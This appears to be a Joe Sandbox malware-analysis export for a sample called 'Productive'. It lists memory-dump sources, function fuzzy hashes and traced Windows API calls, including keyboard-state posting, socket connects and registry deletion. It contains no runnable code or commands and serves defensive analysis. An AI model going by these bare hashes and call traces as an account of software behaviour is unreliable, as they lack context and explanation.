                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                • Opcode ID: 35d85f9c4b59765c49e697a087549287fd34309ec91f864b012b97be04163942
                                                                                                                                                                • Instruction ID: 44dcea700ee8dd55ba57465de8311453cba78153fc06add97e6b7a57c7b4e734
                                                                                                                                                                • Opcode Fuzzy Hash: 35d85f9c4b59765c49e697a087549287fd34309ec91f864b012b97be04163942
                                                                                                                                                                • Instruction Fuzzy Hash: 3B316D762012147FEB168F50CC8AFAA3BADEF4A761F054055FF089E291CB75A851CB70
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                • API String ID: 0-572801152
                                                                                                                                                                • Opcode ID: f1b5c5d65d6b1da16cf67a796508e71eba16d1a2cc58aeacd26c1df1e707bcf6
                                                                                                                                                                • Instruction ID: 2f9c215034322583f646fce62ac734cd4f329676691c6a085fc6e3656ec11687
                                                                                                                                                                • Opcode Fuzzy Hash: f1b5c5d65d6b1da16cf67a796508e71eba16d1a2cc58aeacd26c1df1e707bcf6
                                                                                                                                                                • Instruction Fuzzy Hash: 3EC1C571A0062A9FDF11DF98E884AAEB7F5FB48310F158469EA45EB280D770ED40CB51
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                                                                • Opcode ID: 9d564bd5c5be59c92e3e27fbaa8921bcd4a2bf84fff1cecc92e53de6127e0ead
                                                                                                                                                                • Instruction ID: 72959a831342709e3e5e8ee7566b67e12d6f1852dfed4b54c0752fd593664edd
                                                                                                                                                                • Opcode Fuzzy Hash: 9d564bd5c5be59c92e3e27fbaa8921bcd4a2bf84fff1cecc92e53de6127e0ead
                                                                                                                                                                • Instruction Fuzzy Hash: 75919F70A00229ABDF26CFA5D844FEEBBB8EF45720F10855EF515AB241D7709944CFA0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 81352390280ce904c6a98659a21c833e8e1cf4432c037d2564d678960550b791
                                                                                                                                                                • Instruction ID: 96e2272e4ecd34667bf5406c1bf7c5c51806bf7c9c330e767e70fe8909a4b52a
                                                                                                                                                                • Opcode Fuzzy Hash: 81352390280ce904c6a98659a21c833e8e1cf4432c037d2564d678960550b791
                                                                                                                                                                • Instruction Fuzzy Hash: 42718D34920109EFDB058F59CC98AFEBB79FF86310F648159F915AB251C730AA61CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(013AD7E0), ref: 0033BA5D
                                                                                                                                                                • IsWindowEnabled.USER32(013AD7E0), ref: 0033BA69
                                                                                                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0033BB4D
                                                                                                                                                                • SendMessageW.USER32(013AD7E0,000000B0,?,?), ref: 0033BB84
                                                                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 0033BBC1
                                                                                                                                                                • GetWindowLongW.USER32(013AD7E0,000000EC), ref: 0033BBE3
                                                                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0033BBFB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4072528602-0
                                                                                                                                                                • Opcode ID: c38744cd01b951889c954819f9709da77637e9066066bc7c60c2e9007c09216e
                                                                                                                                                                • Instruction ID: 61dfa178c72e7dbb2a74695a2276a9f1f6bd00c8b2f2b01bdc78418e641c20c3
                                                                                                                                                                • Opcode Fuzzy Hash: c38744cd01b951889c954819f9709da77637e9066066bc7c60c2e9007c09216e
                                                                                                                                                                • Instruction Fuzzy Hash: A5719034604604AFDB379F54C8D5FBAF7B9EF4A300F154059EA8A9B261CB31AD50DB60
                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32(?), ref: 0031178B
                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 003117A0
                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00311801
                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 0031182F
                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0031184E
                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00311894
                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003118B7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                • Opcode ID: f3f6856bee00e503dbd968ae6365b7c4784724e5873a43a80e4c8aaadfe60ad6
                                                                                                                                                                • Instruction ID: 556da52bb4ae5ee7e0487d830a815b8aa6afa277f713f54aadfa54ebd7d8674b
                                                                                                                                                                • Opcode Fuzzy Hash: f3f6856bee00e503dbd968ae6365b7c4784724e5873a43a80e4c8aaadfe60ad6
                                                                                                                                                                • Instruction Fuzzy Hash: 4051E5A1A087D53DFB3B8234CC55BFA7EE95B0A300F098589E2D5498C2D798ECD4D750
                                                                                                                                                                APIs
                                                                                                                                                                • GetParent.USER32(00000000), ref: 003115A4
                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 003115B9
                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 0031161A
                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00311646
                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00311663
                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 003116A7
                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 003116C8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                • Opcode ID: 45288f46f87a85ebd824aa26f4537c7f7ae965328e848617cc9630fcf839febe
                                                                                                                                                                • Instruction ID: 3a1c6fc1eb31ca33d7408dbb7a1df500c295fdacfdacbf24842c8572e6a494d1
                                                                                                                                                                • Opcode Fuzzy Hash: 45288f46f87a85ebd824aa26f4537c7f7ae965328e848617cc9630fcf839febe
                                                                                                                                                                • Instruction Fuzzy Hash: 2C5106A06047D53DFB3B87248C45BFABEA95F0E300F0D4489E6D54A9C2D695ECD4E760
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00337449
                                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 0033745D
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00337477
                                                                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 003374E9
                                                                                                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00337517
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Window
                                                                                                                                                                • String ID: SysListView32
                                                                                                                                                                • API String ID: 2326795674-78025650
                                                                                                                                                                • Opcode ID: da062d1a3cd6985aa66e664c06615c20f7b98c5c39c78dee7e54809307fc30a1
                                                                                                                                                                • Instruction ID: 3f9b4515427be56656afebd40b2746b619fa2794176b4e4129e10bcdbf441470
                                                                                                                                                                • Opcode Fuzzy Hash: da062d1a3cd6985aa66e664c06615c20f7b98c5c39c78dee7e54809307fc30a1
                                                                                                                                                                • Instruction Fuzzy Hash: 8F41A675604348AFEB329F64CCC5BEE77A8EF08350F11442AFA45E7191D671AD94CB50
                                                                                                                                                                APIs
                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00331631
                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0033165B
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00331712
                                                                                                                                                                  • Part of subcall function 00331602: RegCloseKey.ADVAPI32(?), ref: 00331678
                                                                                                                                                                  • Part of subcall function 00331602: FreeLibrary.KERNEL32(?), ref: 003316CA
                                                                                                                                                                  • Part of subcall function 00331602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003316ED
                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 003316B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 395352322-0
                                                                                                                                                                • Opcode ID: f7a00f9af3065aee5121d6e736d2f6127445cb3ffc0595cb688d22468262c895
                                                                                                                                                                • Instruction ID: 16c52192648659b22c130f151b54933cb08f4ac9a6c829ce44d21397d2a298c4
                                                                                                                                                                • Opcode Fuzzy Hash: f7a00f9af3065aee5121d6e736d2f6127445cb3ffc0595cb688d22468262c895
                                                                                                                                                                • Instruction Fuzzy Hash: FB311E75A01119BFDB169F90DC85EFFB7BCEF09301F040169E912A6150EB74AE459BA0
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00336911
                                                                                                                                                                • GetWindowLongW.USER32(013AD7E0,000000F0), ref: 00336944
                                                                                                                                                                • GetWindowLongW.USER32(013AD7E0,000000F0), ref: 00336979
                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 003369AB
                                                                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 003369D5
                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 003369E6
                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00336A00
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2178440468-0
                                                                                                                                                                • Opcode ID: 68ed4b0d19ca3d6b770e4abe215e713b4693dfd218741908dc8302a79383083c
                                                                                                                                                                • Instruction ID: 8ead589e45c1ab67a9d5462b1e5eb66eda6b7291dffbf5c06a9bde94048adf28
                                                                                                                                                                • Opcode Fuzzy Hash: 68ed4b0d19ca3d6b770e4abe215e713b4693dfd218741908dc8302a79383083c
                                                                                                                                                                • Instruction Fuzzy Hash: F9313535604154AFDB22CF58DCCAF6437E9EB4A350F1A81A4F6098F2B1CB71AC90CB51
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030E2CA
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030E2F0
                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0030E2F3
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0030E311
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0030E31A
                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0030E33F
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0030E34D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                • Opcode ID: e324879a863fccc851c2ba9ebb2caea3398c9b3a825d42871de36f0cb0746991
                                                                                                                                                                • Instruction ID: f8907d43710fd88f8e60c016726d871ce23444d5fa22b969fb491046809b9866
                                                                                                                                                                • Opcode Fuzzy Hash: e324879a863fccc851c2ba9ebb2caea3398c9b3a825d42871de36f0cb0746991
                                                                                                                                                                • Instruction Fuzzy Hash: 7921837A705219AFDB11DFA8DC88CBB77ACEB09360B058565FE14DB290DA70AC418B60
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00328475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003284A0
                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003268B1
                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 003268C0
                                                                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003268F9
                                                                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00326902
                                                                                                                                                                • WSAGetLastError.WSOCK32 ref: 0032690C
                                                                                                                                                                • closesocket.WSOCK32(00000000), ref: 00326935
                                                                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0032694E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 910771015-0
                                                                                                                                                                • Opcode ID: 73d14d2f46cd0ac07954dc7b154a0a4916620827b220cc07c2979f3b8e592f64
                                                                                                                                                                • Instruction ID: d38444a608c266f89ce0a36e1bdee16cc94e1280839f2e1bdf089c6c83196c0e
                                                                                                                                                                • Opcode Fuzzy Hash: 73d14d2f46cd0ac07954dc7b154a0a4916620827b220cc07c2979f3b8e592f64
                                                                                                                                                                • Instruction Fuzzy Hash: 7F31E471600228AFDB11AF24DC86BBE7BADEF45724F054029FD05AB291CB70AC448BA1
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030E3A5
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030E3CB
                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0030E3CE
                                                                                                                                                                • SysAllocString.OLEAUT32 ref: 0030E3EF
                                                                                                                                                                • SysFreeString.OLEAUT32 ref: 0030E3F8
                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0030E412
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0030E420
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                • Opcode ID: 098c33dce7a5520a936e395ce6416072f440809af9f886def9d4aa270743c89f
                                                                                                                                                                • Instruction ID: ede283470916dc62960d7a5e5770b25d5375494e9f019e71e2198dd00093e90b
                                                                                                                                                                • Opcode Fuzzy Hash: 098c33dce7a5520a936e395ce6416072f440809af9f886def9d4aa270743c89f
                                                                                                                                                                • Instruction Fuzzy Hash: C3219835705204AFEB159FB9DC88DAF77ECEB09360B418529FE05CB2A0DA70EC418B64
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B214F
                                                                                                                                                                  • Part of subcall function 002B2111: GetStockObject.GDI32(00000011), ref: 002B2163
                                                                                                                                                                  • Part of subcall function 002B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B216D
                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00337C57
                                                                                                                                                                • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00337C64
                                                                                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00337C6F
                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00337C7E
                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00337C8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                • API String ID: 1025951953-3636473452
                                                                                                                                                                • Opcode ID: 0696edfa43c66a5949c4341135ebbc7ca812a7d35cf55b51854a1064c831f99e
                                                                                                                                                                • Instruction ID: a1b51c3d680c913cb2cb0d5b06689a4dfcc4d452a7c716f4b9c956ff303b8dec
                                                                                                                                                                • Opcode Fuzzy Hash: 0696edfa43c66a5949c4341135ebbc7ca812a7d35cf55b51854a1064c831f99e
                                                                                                                                                                • Instruction Fuzzy Hash: 0911B6B2150219BEEF268F60CCC5EE77F5DEF09798F015114BB08A6050C7719C61DBA0
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
